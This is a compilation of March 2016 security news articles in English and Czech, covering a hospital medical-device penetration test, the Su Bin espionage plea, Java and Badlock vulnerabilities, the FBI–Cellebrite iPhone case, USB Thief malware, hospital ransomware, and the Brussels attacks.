There are a number of ways to find vulnerable devices, for example using the Shodan search engine. Using proper requests to Shodan you can find thousands of medical devices exposed to the Internet: a hacker could discover MRI scanners, cardiology equipment, radioactive medical and other related equipment connected to the Internet. A lot of these devices still operate under the Windows XP OS and have dozens of old, unpatched vulnerabilities that could lead to the full compromise of a remote system. Moreover, in some cases these devices have unchanged default passwords that could easily be found in manuals published on the Internet.
Shodan search results
When I was performing my research and penetration testing on a real hospital, I found a few devices connected to Internet, but they were protected quite well: no default passwords, no vulnerabilities in web control interfaces, etc. But even if the facility is protected from the Internet-side, it won’t stop a cybercriminal from looking for other methods to break in if his goal is to get access no matter what.
And here’s the second flaw – devices are not protected from being accessed from local networks.
In my case I just drove to the hospital location and discovered a number of Wi-Fi access points belonging to the hospital. One of them had a weak Wi-Fi password that I was able to crack within two hours. With this password I was able to get access to the internal hospital network; and I found the same medical equipment I previously discovered on the Internet, but with one major difference – now I was able to connect to them because the local network was a trusted network for them. Manufacturers of medical devices, when creating a whole system, protect them from external access. But for some reason they thought that if someone tries to access them internally – it’s trusted by default. This is radically wrong – do not rely on local system administrators and how they organize the internal network protection of a hospital.
This is where the third flaw comes in – vulnerabilities in software architecture.
When I connected to a device and passed through the default login screen, I immediately got access to the control interface and personal data and diagnosis information about hospital patients. But this is not what attracted my attention. There was a command shell implemented in the user interface giving me access to the file system on the device.
Patient MRI result
In my opinion, it’s a major vulnerability in the application design – even if there was no remote access at all, why would software engineers take this opportunity to provide command shell access to the doctor’s interface? It definitely should not be there by default. This is what I was talking about at the beginning. You can provide good protection from one side, but you can completely fail to pay attention to others; and someone who is planning an attack will likely discover something like this and will compromise the whole device.
The other concern about application vulnerabilities is of course outdated versions of operating systems and patch management difficulties. This is a completely different environment from the standard IT infrastructure for PCs or mobile devices; you cannot simply release a patch for a vulnerability and then upload it to medical devices. It’s a complex manual process and in many cases a qualified engineer is needed on the hospital site to perform a system upgrade and to test that the devices are working properly after the update. That takes time and money, so it’s essential to create a protected system from the very beginning – at the development stage – with as few application vulnerabilities as possible.
The vendors of medical equipment and hospital IT teams should pay close attention to the topic of medical cyber-security; they are now on the list of valuable targets in the cybercriminal underground. We will see a growing number of attacks on medical facilities in the year ahead, including targeted attacks, ransomware infections, DDoS, and even attacks to physically damage medical devices. And finally, the industry has started to pay attention – for example the U.S. Food and Drug Administration (FDA) issued guidance outlining important steps medical device manufacturers should take to continually address cyber-security risks to keep patients safe and to better protect the public health.
I would like to give some recommendations to the local IT personnel working in hospitals:
Be aware that cybercriminals are now targeting medical facilities, read about these incidents and try to figure out if the attack methods could affect your own infrastructure.
Stick as close to the implemented IT security policies as possible, and develop timely patch management and vulnerability assessment policies as well.
Focus not only on protecting your infrastructure from outside threats such as malware and hacker attacks but also on maintaining strict control over what’s going on inside your local network, who has access to what, and any other things that could lead to local systems being compromised.
Chinese hacker admitted hacking US Defense contractors
24.3.2016 Hacking
A Chinese national pleaded guilty yesterday, March 23, on charges with hacking trade secrets from US defense contractors.
A Chinese national pleaded guilty yesterday, March 23, on charges with hacking trade secrets from US defense contractors. The man, Su Bin (also known as Stephen Su and Stephen Subin), 50, had been charged in a 2014 indictment with hacking into the computer networks of US defense contractors, including the Boing. The hackers aimed to steal blueprints and intellectual property for the F-22 and F-35 fighter jets and C-17 transport aircraft. In January 2015, Edward Snowden revealed China stole designs for the US-built F-35 Fighter jet hacking computer systems at US Defense contractors, and provides details also a counter-intelligence operation run by the NSA.
According to Snowden, the US Intelligence was aware that Chinese cyber spies have stolen “many terabytes of data” about the design of Australia’s Lockheed Martin F-35 Lightning II JSF. The details of the operation are described in a set of top secret documents published by the Der Spiegel magazine.
Chinese hackers have allegedly stolen as much as 50 terabytes of data from the US Defense contractors, including the details of the fighter’s radar systems, engine schematics, “aft deck heating contour maps,” designs to cool exhaust gasses and the method the jet uses to track targets.
The purpose of the Chinese Government is to acquire intellectual property on advanced technologies, benefiting Chinese companies on the market and narrowed the gap in the research of advanced technological solution. Military experts speculated that the stolen blueprints could help the country to develop a new generation of advanced aircraft fighter, so-called “fifth-generation” fighters.
In 2014, according to a US criminal complaint, computers of Boeing and other military contractors have been hacked to steal intellectual property and trade secrets on transport aircraft. The initial attacks against Boeing likely occurred between Jan 14th and March 20th, 2010. The complaint is dated June 27th and was disclosed on July 2015, it describes how the attackers have spied on Boeing computer networks for a year, and then have compromised systems of the principal US Defense contractors to steal intellectual property. According to the information disclosed, the hackers were mainly interested in the C-17 military transport.
The US law enforcement agencies accused Su Bin, a Chinese businessman residing in Canada, of supporting two countrymen in the organization of cyber attacks on Boeing systems to collect information about the C-17 and other military programs.
Chinese hacker admitted hacking US Defense contractors
The criminal complaint revealed that Su Bin with two unnamed co-conspirators, identified as UC1 and UC2, were collecting technical information related to components and performance of the C-17 transport and Lockheed Martin’s F-22 and F-35 fighter jets. During the period related the first attacks against Boeing, Su Bin was operating in the United States, as confirmed by FBI Special Agent Noel Neeman in the complaint.
Su Bin was arrested on June 2014 month in Canada, Neeman revealed that an email attachment sent by UC1 claims the Chinese hackers exfiltrated 65 gigabytes of data over a couple of years, including information on the C-17 transport from Boeing systems. The FBI agent collected evidence of data theft from Boeing systems, but there is no proof that the data that the stolen information was classified. The email provides also information related to the huge effort spent by hackers to compromise the Boeing system, the document details the architecture of the internal network of Boeing, which includes 18 domains, 10,000 PC and a “huge quantities” of defense appliances.
“Through painstaking labor and slow groping, we finally discovered C-17 strategic transport aircraft-related materials stored in the secret network,” the document says.
He was sent to the United States in February 2016.
The hackers described the difficulties to breach the system avoid detection system deployed by Boeing.
“From breaking into its internal network to obtaining intelligence, we repeatedly skipped around in its internal network to make it harder to detect reconnaissance, and we also skipped around at suitable times in countries outside the U.S. In the process of skipping, we were supported by a prodigious quantity of tools, routes and servers, which also ensured the smooth landing of intelligence data.” states the report.
The complaint did not provide any description on how hackers have stolen information about the Lockheed Martin jet fighters.
Another document issued by the FBI described the communications between UC1 and UC2, which states that the Chinese hackers successfully acquired information about US military project by establishing hot points in the U.S., France, Japan and Hong Kong. This last document, according to the complaint, reveals that the subjects have received about $1 million to build a team and infrastructure outside of China, the investigators are working to understand who has funded the entire operation.
Now in a plea agreement filed in a California federal court, Su admitted to conspiring with two unnamed persons in China from October 2008 to March 2014 to hack network of US contractors and steal “sensitive military information and to export that information illegally from the United States to China.”
The Court documents did not provide details on who operated the cyber espionage campaign, but security and intelligence experts believe that Su was working for the Chinese Government.
“Su Bin admitted to playing an important role in a conspiracy, originating in China, to illegally access sensitive military data, including data relating to military aircraft that are indispensable in keeping our military personnel safe,” said Assistant Attorney General John Carlin.
“This plea sends a strong message that stealing from the United States and our companies has a significant cost; we can and will find these criminals and bring them to justice.”
Sentencing was set for July 13, when Su faces a maximum penalty of five years in prison and a monetary fine of $250,000 or twice the gross gain from the offense.
The US government will issue a final ruling on the case on July 13. The Chinese man faces a maximum penalty of five years in prison and a monetary fine of $250,000 or twice the gross gain from the offense.
Patch Java immediately or attackers can hack you
24.3.2016 Vulnerebility
The CVE-2016-0636 flaw affects Java SE running in web browsers on desktops, attackers can trigger it remotely to takeover your PC.
Once again a serious security vulnerability affects the Java Oracle software, the new flaw coded as CVE-2016-0636 scored a 9.3 on the Common Vulnerability Scoring System bug severity rating.
The CVE-2016-0636 vulnerability affects Java SE running in web browsers on desktops, this means that an attacker could set up a malicious web page to remotely take over a vulnerable PC. The new vulnerability may be remotely exploitable without authentication.
Java_Bugs
“This vulnerability may be remotely exploitable without authentication, i.e., may be exploited over a network without the need for a username and password. To be successfully exploited, an unsuspecting user running an affected release in a browser will need to visit a malicious web page that leverages this vulnerability. Successful exploits can impact the availability, integrity, and confidentiality of the user’s system.” states the Oracle Security Alert for CVE-2016-0636.
“Oracle Java SE 7 Update 97, and 8 Update 73 and 74 for Windows, Solaris, Linux, and Mac OS X are affected.”
This vulnerability applies to Java deployments that load and run untrusted code coming from the internet. This vulnerability is not applicable to Java deployments that run only trusted code and does not affect Oracle server-based software.
Due to the high severity of this CVE-2016-0636 vulnerability and the public disclosure of technical details it is essential to upgrade the Java software as soon as possible.
“Due to the severity of this vulnerability and the public disclosure of technical details, Oracle strongly recommends that customers apply the updates provided by this Security Alert as soon as possible.” states Oracle.
Releases installed by Windows users are automatically updated, Oracle released an update version of Java, Java SE 8u77.
Reset a poslání hesla v čitelné podobě e-mailem? Nebezpečná praktika
24.3.2016 Zdroj: Lupa.cz Ochrany
Používáte-li nějaký placený servis, kde osoba s přístupem ke službě může ovlivnit kolik platíte, chcete, aby služba byla bezpečná. To je jasné.
Pokud používáte služby mediálního monitoringu od Newton Media, tak jste se asi setkali s podivným zvykem. Zhruba tak jednou za měsíc vám přijde e-mailem nové heslo. Se zdůvodněním, že jde o bezpečnostní opatření, aby někdo nemohl heslo zneužít. Proto je heslo automaticky změněno a posláno zákazníkovi.
Je to velmi zvláštní a nebezpečná praktika, která má dva zásadní problémy. Jeden menší: zbytečné měnění hesla a tím neustálá nutnost někde nové heslo evidovat, aniž by bylo umožněno používat vlastní bezpečné heslo dle vlastního uvážení. Vynucované změny hesla obvykle vedou k tomu, že lidé používají hesla nebezpečná (protože si nové a nové složité heslo nedokážou zapamatovat) nebo si hesla samotná prostě věší na lístečky na monitor.
Ten větší a zásadnější problém je ale v posílání nového hesla v čitelné podobě e-mailem. E-mail není bezpečná forma komunikace a někdo ho může přečíst nejenom cestou, ale také se může dostat do cizí poštovní schránky, k cizímu mobilu, počítači či tabletu.
Velmi zvláštní přístup Newton Media jsme chtěli vysvětlit, včetně dotazu na to, jakým způsobem ukládají hesla zákazníků. Dotaz poslaný 7. března se dočkal odpovědi až 21. března po několika upomínkách. Kompletní odpověď:
ad 1) V nových aplikacích již není heslo ukládáno v systémech NEWTON Media vůbec. Úvodní náhodně generované heslo je zasláno klientovi, který si jej musí při prvním přihlášení změnit a v NEWTON Media je uložen pouze hash (otisk) tohoto hesla sloužící k ověření hesla zadaného uživatelem při následujících přihlášeních. Nové aplikace samozřejmě již komunikují pouze přes šifrovaný protokol HTTPS.
ad 2) Ve starších aplikacích NEWTON Media (např. MediaSearch) je volitelně ukládán buď kompletní text hesla, nebo také pouze hash. Volba závisí na přání klienta. V nejstarší aplikaci IMM je ukládán kompletní text hesla. V případě ukládání kompletního textu hesla je heslo šifrováno/dešifrováno aplikací, takže je uloženo v databázi v nečitelné podobě a tudíž ani administrátor databáze nemá možnost heslo číst.
Plyne z ní to, že pokud některý z produktů (aplikací) od Newton Media používáte, je možné, že vaše heslo je uloženo v plně čitelné podobě a má ho k dispozici kdokoliv, včetně případného útočníka, který získá přístup k databázím.
Po doplňujících otázkách také víme, že použitý hash je SHA algoritmus v .NET frameworku, doplněný o salt, také pomocí náhodného generátoru z .NET. Výše zmíněné resetování hesla se týká pouze starých aplikací a prý tato funkčnost byla „zavedena na četné žádosti zákazníků“.
Což přináší zásadní otázku: je skutečně dobré řídit se nebezpečnými nápady zákazníků? V nových aplikacích ale tato potenciálně nebezpečná funkčnost již není.
Takhle by mohli v FBI vydolovat data ze zašifrovaného iPhonu
24.3.2016 Zdroj: Zive.cz Mobilní
V kauze FBI vs. Apple došlo k odložení verdiktu, jelikož v FBI prý našli způsob jak odblokovat zašifrovaný iPhone útočníka Syeda Farooka. Jediná známá informace je, že s odemykáním telefonu by měla být nápomocná třetí strana. Žádné bližší informace neznáme, a to přináší prostor pro další spekulace.
Recode přináší vyjádření Jonathana Zdziarskeho (v hackerské komunitě známý spíše jako NerveGas). Hacker naznačuje, že jedním z možných způsobů, jak zabezpečení telefonu prolomit, je metoda „brute force“ – jednoduše vyzkoušet co nejvíce možných kombinací a najít správný kód.
16320-13026-iphone5c-guts-l.jpg
FBI by při hackování iPhonu 5C prý mohla použít metodu NAND mirroring
Má to ale jeden háček, telefon je chráněn proti opakovanému zadání chybného kódu a při několikátém pokusu se smažou veškerá data. Způsob jakým by se toto dalo obejít je dle Zdziarského NAND mirroring, tedy zkopírovat obsah flash paměti na externí médium. To vyžaduje vyjmutí paměťového čipu z telefonu a jeho připojení na čtečku.
Čip by poté byl vrácen zpět a pokud by se nepodařilo trefit číselnou kombinaci pro odemknutí telefonu, paměť by byla přehrána původní zálohou a pokus by se mohl opakovat. Jedinou překážkou je zde bezpečné vyjmutí čipu z telefonu. Při pokusu o vyjmutí by mohlo dojít k jejich poškození.
Israeli Cellebrite firm is helping FBI in cracking San Bernardino shooter’s iPhone
24.3.2016 Apple
The Israeli Cellebrite firm is helping the Federal Bureau of Investigation (FBI) in unlocking San Bernardino shooters’ iPhone.
In the last weeks, we have followed the case of the San Bernardino shooter’s iPhone that a few days ago reached an unexpected conclusion, the FBI announced on Monday to have found a way to unlock the mobile device without the Apple’s help.
The court filing doesn’t provide technical details on the technique, but confirmed that an independent party demonstrated to the US authorities a technique for unlocking the controversial iPhone.
“On Sunday, March 20, 2016, an outside party demonstrated to the FBI a possible method for unlocking Farook’s iPhone,” revealed the lawyers for the US Government in a court filing Monday afternoon. “Testing is required to determine whether it is a viable method that will not compromise data on Farook’s iPhone. If the method is viable, it should eliminate the need for the assistance from Apple set forth in the All Writs Act Order in this case,”
Now the name of the company is circulating on the Internet, it is the Israeli mobile forensics firm Cellebrite that is one of the leading companies in the world in the field of digital forensics. The company already works with the principal law enforcement and intelligence agencies worldwide.
Cellebrite provides the FBI with decryption technology as part of a contract signed in 2013, its technology allows investigators to extract information from mobile devices.
“Cellebrite’s technology is able to extract valuable information from cellular devices that could be used in criminal and intelligence investigations, even if the phone and the information it contains are locked and secure.” states a blog post published on the Israeli YNetNews.
The website of the Cellebrite company confirms that its technology allows investigators to unlock Apple devices running iOS 8.x.
“Cellebrite’s Advanced Investigative Services (CAIS) offers global law enforcement agencies a breakthrough service to unlock Apple devices running iOS 8.x. This unique capability is the first of its kind – unlock of Apple devices running iOS 8.x in a forensically sound manner and without any hardware intervention or risk of device wipe.” reports the company website.“Cellebrite’s unlocking capability supports the following devices: iPhone 4S / 5 / 5C, iPad 2 / 3G / 4G,iPad mini 1G, and iPod touch 5G running iOS 8 – 8.0 / 8.0.1/ 8.0.2 / 8.1 / 8.1.1 / 8.1.2 / 8.1.3 / 8.2/ 8.3 / 8.4 / 8.4.1.”
One of its main solutions designed by the company is the Universal Forensic Extraction Device (UFED) that could be used to extract all data and passwords from mobile phones.
If Cellebrite will be able to crack the San Bernardino shooter’s iPhone, the FBI will no longer need the Apple’s help.
cellebrite ufed-touch
According to public documents, the FBI Feds committed to a $15,278 “action obligation” with Cellebrite.
At the time I was writing there were no details of the contract between the FBI and the Cellebrite firm.
Israeli Forensic Firm 'Cellebrite' is Helping FBI to Unlock Terrorist's iPhone
23.3.2016 Apple
Meet the security company that is helping Federal Bureau of Investigation (FBI) in unlocking San Bernardino shooters’ iPhone:
The Israeli mobile forensics firm Cellebrite.
Yes, Cellebrite – the provider of mobile forensic software from Israel – is helping the FBI in its attempt to unlock iPhone 5C that belonged to San Bernardino shooter, Syed Rizwan Farook, the Israeli YNetNews reported on Wednesday.
The company's website claims that its service allows investigators to unlock Apple devices running iOS 8.x "in a forensically sound manner and without any hardware intervention or risk of device wipe."
If Cellebrite succeeds in unlocking Farook’s iPhone, the FBI will no longer need Apple to create a backdoored version of its iOS operating system that could let it access data on Farook's locked iPhone 5C.
Apple is engaged in a legal encryption battle with the US Department of Justice (DoJ) over a court order that forces the company to write new software, which could disable passcode protection on Farook's iPhone 5C.
However, Apple is evident on its part, saying that the FBI wants the company to create effectively the "software equivalent of cancer" that would likely open up all iPhones to malicious hackers.
FBI Committed $15,278 "action obligation" with Cellebrite
The revelation comes just two days after the DoJ suspended the proceedings at least until next month. The FBI told a federal judge Monday that it need some time to test a possible method for unlocking the shooter's iPhone for which they have hired an "outside party".
According to public records, the same day the Feds committed to a $15,278 "action obligation" – the lowest amount the government has agreed to pay – with Cellebrite.
Many details of the contract are not yet available, and neither the FBI nor Cellebrite has officially commented on their contract publicly.
Watch Video: Here’s What Cellebrite Can Do
Founded in 1999, Cellebrite provides digital forensics tools and software for mobile phones. One of its main products is the Universal Forensic Extraction Device (UFED) that claims to help investigators extract all data and passwords from mobile phones.
For the company's hand on iOS devices, you can watch the 2015 YouTube video (above), demonstrating one of Cellebrite's products that unlocked the device in several hours.
Now the question is:
If the FBI found its iPhone backdoor that has the potential to affect hundreds of millions of Apple users…
Will the FBI report the flaw to Apple or keep it to itself? Let us know in the comments below.
Warning! Think Twice Before Using USB Drives
23.3.2016 Safety
Security researchers have discovered a new data-stealing Trojan that makes special use of USB devices in order to spread itself and does not leave any trace of activity on the compromised systems.
Dubbed USB Thief ( or Win32/PSW.Stealer.NAI), the malware has the capability of stealthy attacking against air-gapped or isolated computers, warns ESET security firm.
The malware author has employed special programs to protect the USB Thief from being reproduced or copied, making it even harder to detect and reverse-engineer.
USB Thief has been designed for targeted attacks on computer systems that are isolated from the Internet, according to the ESET malware analyst Tomáš Gardoň.
The 'USB Thief' Trojan Malware
The USB Thief Trojan malware is stored either as a portable application's plugin source or as a Dynamically Linked Library (DLL) used by the portable application.
Since USB devices often store popular applications like Firefox, Notepad++ or TrueCrypt portable, once any of these applications is executed, the malware starts running in the background.
USB Thief is capable of stealing data from air-gapped systems – systems that are isolated from the Internet and other external networks.
"Well, taking into account that organizations isolate some of their systems for a good reason," explained Peter Stancik, the security evangelist at ESET. "Any tool capable of attacking these so called air-gapped systems must be regarded as dangerous."
The malware runs from a USB removable device, so it don’t leave any traces of its activities, and thus, victims do not even notice that their data had been stolen.
Since the malware is bound to a single USB device, it prevents USB Thief from leaking from the infected computers.
Besides this, USB Thief utilizes a sophisticated implementation of multi-staged encryption that makes the malware harder to detect and analyse.
"This is not a very common way to trick users, but very dangerous," Stancik said. "People should understand the risks associated with USB storage devices obtained from sources that may not be trustworthy."
Here's How you can Protect from being Infected:
Do not use USB storage devices from non-trustworthy sources.
Turn off Autorun
Regularly backup your data
More technical details are available on ESET Ireland’s official blog.
Badlock — Unpatched Windows-Samba Vulnerability Affects All Versions of Windows
23.3.2016 Vulnerebility
Security researchers have discovered a nasty security vulnerability that is said to affect almost every version of Windows and Samba and will be patched on April 12, 2016, the Samba development team announced Tuesday.
So, Save the Date if you are a Windows or Samba file server administrator.
Samba is a free, open source implementation of the SMB/CIFS network file sharing protocol that runs on the majority of operating systems available today, including Windows, UNIX, Linux, IBM System 390, and OpenVMS.
Samba allows non-Windows operating systems, like GNU/Linux or Mac OS X, to communicate with the same networking protocol as the Windows products, thus enabling users to access network shared folders and files from Windows OS.
Dubbed Badlock, the vulnerability has been discovered by Stefan Metzmacher, a developer of Samba Core Team.
Details about the Badlock vulnerability will be disclosed on April 12, when the developers of Microsoft and Samba release security patches to fix the flaw.
With a proper name, website and even logo, Badlock seems to be another marketed vulnerability that will likely be exploited by hackers once its details become public.
Here's what Badlock.org website reads:
On April 12th, 2016 a crucial security bug in Windows and Samba will be disclosed. We call it: Badlock. Engineers at Microsoft and the Samba Team are working together to get this problem fixed. Patches will be released on April 12th.
Admins and all of you responsible for Windows or Samba server infrastructure: Mark the date. (Again: It's April 12th, 2016.) Please get yourself ready to patch all systems on this day. We are pretty sure that there will be exploits soon after we publish all relevant information.
Although this sort of pre-notification is appreciated, especially for system administrators to help them apply the patch as soon as possible, the security blunder could also benefit the bad guys.
Security experts also believe that the available information might be enough for malicious hackers to independently find Badlock and exploit the vulnerability before a patch is released.
Three Syrian Electronic Army Hackers are in the FBI Most Wanted
23.3.2016 Crime
Three members of the Syrian Electronic Army hacker crew have been inserted by the US authorities in the list of most wanted criminals.
The Syrian Electronic Army, aka SEA, is considered one of most dreaded hacking crew that first appeared in 2011. According to the report “Syrian Electronic Army – Hacktivision to Cyber Espionage?,” published in 2014, in the beginning, the Syrian Electronic Army was mainly politically motivated, members of the collective hacked to spread political messages pro Syrian President Bashar Al-Assad.
But over time, the group has increased its popularity, targeting principal enterprises like Microsoft and Twitter, and media agencies like The New York Times, Reuters, the Associated Press, E! Online, Time, CNN, The Washington Post, The Daily Dot, Vice, Human Rights Watch, Harvard University, NASA and The Onion.
The list of victims of the Syrian Electronic Army also includes the US CENTCOM and the White House.
As revealed by the reports the “SEA has evolved into the realm of global espionage, where some of their targets are “C” level executives at technology and media companies, allied military procurement officers, United States defense contractors, and foreign attaches and embassies.”
Now three members of the Syrian Electronic Army were inserted by the FBI in the FBI Most Wanted List, they are:
Ahmad Umar Agha (aka The Pro), 22
Firas Dardar (aka The Shadow), 27
Peter Romar, 36
The three alleged members of the hacker collective are thought to be actually resident in Syria, it is impossible to arrest them over there.
The US Department of Justice and the Federal Bureau of Investigation (FBI) are willing to pay $100,000 reward for any information that leads to the capture of the alleged leaders of the Syrian Electronic Army.
Agha and Dardar have been added to the FBI’s Most Wanted list.
The authorities believe that Ahmad Umar Agha and Firas Dardar were involved in the hacking of the Twitter Account of the Associated Press in April 2013, the hackers spread fake news of a cyber attack against the White House that had a serious effect on the stock market.
The hackers were involved in numerous hacking and propaganda campaigns from 2011 to 2013.
“According to allegations in the first complaint, beginning in or around 2011, Agha and Dardar engaged in a multi-year criminal conspiracy under the name “Syrian Electronic Army” in support of the Syrian Government and President Bashar al-Assad. ” reads the US Department of Justice (DoJ) statement .
“The conspiracy was dedicated to spear-phishing and compromising the computer systems of the US government, as well as international organizations, media organizations and other private-sector entities that the SEA deemed as having been antagonistic toward the Syrian Government”
The FBI tracked the hackers online, in particular, the authorities obtained court orders to search their online accounts on Gmail and Facebook platforms. The hackers, in fact, used the popular services to communicate and exchange the stolen data.
The charges for Agha and Dardar are each charged with multiple conspiracies related to computer hacking including:
Engaging in a hoax regarding a terrorist attack
Attempting to cause mutiny of the US armed forces
Access device fraud
Illicit of authentication features
Unlawful access to stored communications
Unauthorized access to, and damage of, computers
Dardar and Pierre Romar, are separately charged with conspiracies related to:
Unauthorized access to, and damage of, computers
Receiving the proceeds of extortion
Money laundering
Wire fraud
Violations of the Syrian Sanctions Regulations
Nation-state hacking or cybercrime?
This is the position of the U.S. Assistant Director Trainor.
“Cybercriminals cause significant damage and disruption around the world, often under the veil of anonymity,” said Assistant Director Trainor. “As this case shows, we will continue to work closely with our partners to identify these individuals and bring them to justice, regardless of where they are.”
“These three members of the Syrian Electronic Army targeted and compromised computer systems in order to provide support to the Assad regime as well as for their own personal monetary gain through extortion,” said Assistant Director in Charge Abbate. “As a result of a thorough cyber investigation, FBI agents and analysts identified the perpetrators and now continue to work with our domestic and international partners to ensure these individuals face justice in the United States. I want to thank the dedicated FBI personnel, federal prosecutors, and our law enforcement partners for their tremendous efforts to ensure on-line criminal activity is countered, U.S. cyber infrastructure is safeguarded, and violators are held accountable under the law.”
“The tireless efforts of U.S. prosecutors and our investigative partners have allowed us to identify individuals who have been responsible for inflicting damage on U.S. government and private entities through computer intrusions,” said U.S. Attorney Boente. “Today’s announcement demonstrates that we will continue to pursue these individuals no matter where they are in the world.”
All of the three alleged members are thought to be resident in Syria. The United States government is inviting tip-offs.
The FBI is investigating ransomware-based attack at Methodist Hospital
23.3.2016 Virus
The FBI is investigating cyber-attack at Methodist Hospital in Henderson, once again a ransomware hit a critical infrastructure.
Ransomware is one of the most dangerous cyber threats for businesses and government organizations, the number of infections worldwide is in constant increase. Recently I reported the discovery in the wild of the a new variant of the TeslaCrypt, meanwhile security firms are warning on a spike in the number of attacks bases on the Locky malware.
What happen when ransomware hits a critical infrastructure?
The impact could be serious, in the last months, a ransomware hit Israeli Public Utility Authority with a severe impact on its operations, meanwhile several attacks hit computer systems of hospitals in the US and Germany.
In February, two German hospitals were infected by a ransomware, in a similar way occurred recently at the US Hollywood Presbyterian Medical Center. The Los Angeles hospital paid about $17,000 to the crooks for restoring patients’ files.
News of the day, the systems at another US hospital have been infected by ransomware, it is the Methodist Hospital in Kentucky that’s been infected.
According to NewsChannel10, the Methodist Hospital in Henderson was hit my a ransomware that locked patients’ files and is demanding money for to regain access to them. Officials say that the hospital paid about $17,000 to those hackers for the access back to the patients’ files.
“In the past, we haven’t seen crimes in such a large scale like Methodist,” said KSP trooper Shane Settle. “In general, the more a criminal commits a crime, the more confident they get, especially if they get away with it. I think that’s what you’re seeing here is they are shooting for a much larger target and more money.”
“We’ve notified the FBI, we’re dealing with federal authorities on how to deal with it,” said David Park, Methodist Hospital COO. “Depending upon the number of records that were locked, depends upon whether we’re going to consider looking into whether we pay anything or not.”
The ransomware copies the patients’ files, encrypted them and then the deleted the originals. The good news is that the IT staff at the Methodist Hospital in Henderson has updated backups, this drastically limits the effects of the ransomware on the infrastructure.
In a press release, Methodist Hospital officials reassured patients their information is secure, the hospital is currently working with a backup infrastructure while the internal staff is sanitizing the systems
ransomware hit Methodist Hospital Henderson
We must expect similar attacks in the next future, medical data are a precious commodity in the underground.
According to The Ponemon Institute’s 2015 Global Cost of Data Breach Study, the health care industry suffered the highest costs that were estimated at an average of $363 per record, a data that doesn’t surprise the experts due to the higher value of medical records respect credit card data.
A set of complete health insurance credentials sold for $20 on the underground markets in 2013 — 10 to 20 times the price of a U.S. credit card number with a security code, according to Dell.
Caleb Barlow, vice president at IBM Security, explained that data in a medical record have a much longer shelf life than that of a credit card number.
“With credit cards, the time frame from the breach to mitigation is very short,” Barlow explained. “But the health care record can be used to establish access in perpetuity,” “it can be used to establish credit or steal your identity ten or fifteen years from now,” he added. “Once this information is out there, you can’t get the genie back in the bottle.”
UPDATED – Brussels explosions, dozens dead after blasts at Zaventem airport and Maalbeek metro
23.3.2016 Crime
Brussels explosions, dozens dead after blasts at Zaventem airport and Maalbeek metro, it is a terror attack. Panic and chaos in the city. The IS claims the responsibility for the attack.
This morning the Europe has fallen again in terror, just months after the Paris attacks a new wave of attacks hit the West. This morning a sequence of explosions have been detonated at Brussels Airport in an alleged suicide bomber terror attack.
“We can confirm that there have been two explosions in the departure hall. We called the emergency services on the ground – they [are] now provid[ing] first aid to the injured.” said Anke Fransen, spokeswoman for the Brussels Airport.
The first two Brussels explosions have hit the departure hall at the international Zaventem airport shortly before 8am, next to the American Airlines check-in desk. Other explosions have been detonated at the Schuman and Malbeek metro station, not far from the EU headquarters. The explosions at a metro station in Maalbeek occurred one hour later.
Brussels explosions maps
Source FT.com
A government source confirmed to VRT broadcaster that it was a terror attack, the number of victims is increasing minute after minute, last news reports at least 34 dead and hundreds people injured.
“A Belgian news agency is reporting that shots were fired and words in Arabic were heard being shouted before the blasts.” reported the British Mirror.
Brussels explosions
Source FT.comr.
Local authorities are inviting people to not come near the area under attack.
Brussels Airport’s Twitter account told followers: “There have been 2 explosions at the airport.
Local media reported that as many as 14 people were killed at the airport, with hundreds injured, and 20 killed at the metro station. These numbers are not official and must be confirmed by the authorities.
The Brussels explosions come only a day after the Belgium’s interior minister, Jan Jambon, warned possible terror attacks after the recent arrest Salah Abdeslam, one of the participants of the Paris terror attacks.
My thoughts are with the people of Brussels following these ignoble attacks.
From a cyber security perspective, I invite all to remain vigilant, crooks will try to exploit the media attention on the Brussels explosions sharing bogus videos and malicious link. It is likely we will detect a phishing campaign trying to exploit the event.
Pierluigi Paganini
(Security Affairs – Brussels explosions, terror attack)
Update 2016-03- 22, 14:00 GMT
The blood feud is lengthy, o dogs of Europe… Did you think for a day that we would forget to avenge your occupation of the Muslims’ lands?”
1/2 One top #ISIS distribution account celebrated #Brusselsattack: “”The blood feud is lengthy, o dogs of Europe…
Update 2016-03- 23, 11:30 GMT
According to La Derniere Heure press, the man arrested isn’t Najim Laachraoui.
Update 2016-03- 23, 10:00 GMT
Attack in Brussels, authorities arrested the third man, the alleged the artificer.
Update 2016-03- 23, 9:00 GMT
The authorities have identified two suicide bombers, the brothers Khaled and Ibrahim El Bakraoui. The third man that wears a hat on the right would be the artificer of the group and according to the intelligence, he is the same artificer of the Paris attacks.
Tor zlepšuje zabezpečení, dokáže odhalit špehovací kód
23.3.2016 Zabezpečení
Společnost již tři roky vylepšuje své schopnosti při odhalování podvodného softwaru.
Projekt Tor zdokonalil svůj software na takovou úroveň, že dokáže rychle detekovat, zda se s konkrétní sítí nějak manipulovalo pro sledovací účely, napsal v pondělí jeden z hlavních developerů projektu.
Panují obavy, že by Tor mohl být buď rozvrácen, či omezen soudními příkazy, což by mohlo přimět projekt předat citlivé informace vládním společnostem; tedy podobný případ, jako je současný spor Apple vs. soud Spojených států.
Vývojáři Toru tedy nyní vytváří systém takovým způsobem, aby vícero lidí mohlo zkontrolovat, zda kód nebyl pozměněn a který „eliminuje jednotlivá selhání,“ napsal také v pondělí Mike Perry, hlavní vývojář prohlížeče Tor Browser.
Během několika posledních let se Tor soustředil na to umožnit uživatelům přístup k jejich zdrojovému kódu, který si následně mohou pozměnit a vytvořit tak vlastní buildy Toru, jež se dají následně ověřit veřejnými šifrovacími klíči organizace a jinými kopiemi aplikace.
„I kdyby vláda nebo zločinci získali naše šifrovací klíče, naše sítě a její uživatelé by zvládli rychle odhalit tuto skutečnost a nahlásit ji jako bezpečnostní hrozbu,“ pokračuje Perry. „Z technického pohledu, naše revize a proces vývoje zdrojového kódu způsobují, že pravděpodobnost odhalení takového škodlivého kódu by byla vysoká, a náprava rychlá.“
Minimálně dva šifrovací klíče by byly potřeba, aby upravená verze Tor Browseru alespoň zpočátku překonala bezpečnostní opatření: SSL/TSL klíč, který zabezpečuje spojení mezi uživatelem a Torem, a klíč užívaný jako podpis softwarových aktualizací.
„Právě teď jsou potřeba dva klíče, a tyto klíče ani nemají k dispozici ti samí lidé,“ píše Perry v Q&A na konci svého příspěvku. „Také jsou oba zabezpečeny různým způsobem.“
I kdyby útočník klíče získal, teoreticky by uživatelé byli schopni prozkoumat hash sofwaru a tak přijít na to, zda nebyl škodlivě upraven.
